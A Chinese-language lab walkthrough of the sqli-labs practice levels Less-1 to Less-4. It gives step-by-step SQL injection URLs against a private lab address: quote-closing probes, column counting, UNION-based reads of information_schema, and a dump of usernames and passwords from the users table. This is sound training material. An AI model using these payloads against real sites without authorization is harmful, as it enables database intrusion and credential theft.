sqli-labs测试Less-1到Less-4

Less-1单引号闭合

1、正常页面sqli-labs测试Less-1到Less-4_第1张图片
2、输入单引号后,页面出现报错信息。
http://192.168.195.110/sqli-labs/Less-1/?id=1’sqli-labs测试Less-1到Less-4_第2张图片
http://192.168.195.110/sqli-labs/Less-1/?id=1’ and 1=1 – +显示正常
sqli-labs测试Less-1到Less-4_第3张图片
http://192.168.195.110/sqli-labs/Less-1/?id=1’ and 1=2 – + 显示异常
说明存在注入漏洞
sqli-labs测试Less-1到Less-4_第4张图片
3、order by 断段列数,到4时,页面显示异常,说明前面查询了3列。
http://192.168.195.110/sqli-labs/Less-1/?id=1’ order by 4 – +
sqli-labs测试Less-1到Less-4_第5张图片
4、确认回显位置:
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,2,3 – +
sqli-labs测试Less-1到Less-4_第6张图片
返回结果可以看出2和3的位置可以进行语句替换

5、获取数据库名
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,database(),3 – +
sqli-labs测试Less-1到Less-4_第7张图片
6、获取数据表名
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=“security” – +
sqli-labs测试Less-1到Less-4_第8张图片
users表为我们要找的用户信息表。

7、获取数据表中的字段:
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=“security” and table_name=“users” – +
sqli-labs测试Less-1到Less-4_第9张图片
username和password字段为需要获取信息。

8、列出字段信息
192.168.195.110/sqli-labs/Less-1/?id=-1’ union select 1,group_concat(username,0x3a,password),3 from users – +
用户名和密码之间以分号(:)隔开,0x3a表示分号
sqli-labs测试Less-1到Less-4_第10张图片

Less-2 数字型

1、and 1=1 显示正常
http://192.168.195.110/sqli-labs/Less-2/?id=1 and 1=1 – +
sqli-labs测试Less-1到Less-4_第11张图片
2、and 1=2 显示异常
http://192.168.195.110/sqli-labs/Less-2/?id=1 and 1=2 – +
sqli-labs测试Less-1到Less-4_第12张图片
3、获取数据库信息
语句请参考Less-1

Less-3 闭合方式 ')

1、输入单引号后,跟提示发现有个)
http://192.168.195.110/sqli-labs/Less-3/?id=1’
sqli-labs测试Less-1到Less-4_第13张图片
2、可以尝试通过 ‘)来闭合测试
http://192.168.195.110/sqli-labs/Less-3/?id=1’) and 1=1 – + 显示正常
sqli-labs测试Less-1到Less-4_第14张图片
http://192.168.195.110/sqli-labs/Less-3/?id=1’) and 1=2 – + 显示异常
sqli-labs测试Less-1到Less-4_第15张图片
3、获取数据库信息
语句请参考Less-1

Less-4 闭合方式 ")

1、先尝试用双引号闭合,
http://192.168.195.110/sqli-labs/Less-4/?id=1%22
sqli-labs测试Less-1到Less-4_第16张图片
2、跟据报错信息,尝试用 “)闭合测试
http://192.168.195.110/sqli-labs/Less-4/?id=1”) and 1=1 – +
显示正常
sqli-labs测试Less-1到Less-4_第17张图片
http://192.168.195.110/sqli-labs/Less-4/?id=1") and 1=2 – +
显示异常
sqli-labs测试Less-1到Less-4_第18张图片
3、获取数据库信息
http://192.168.195.110/sqli-labs/Less-4/?id=-1") union select 1,database(),3 – +
sqli-labs测试Less-1到Less-4_第19张图片
其他语句请参考Less-1

你可能感兴趣的:(SQL注入)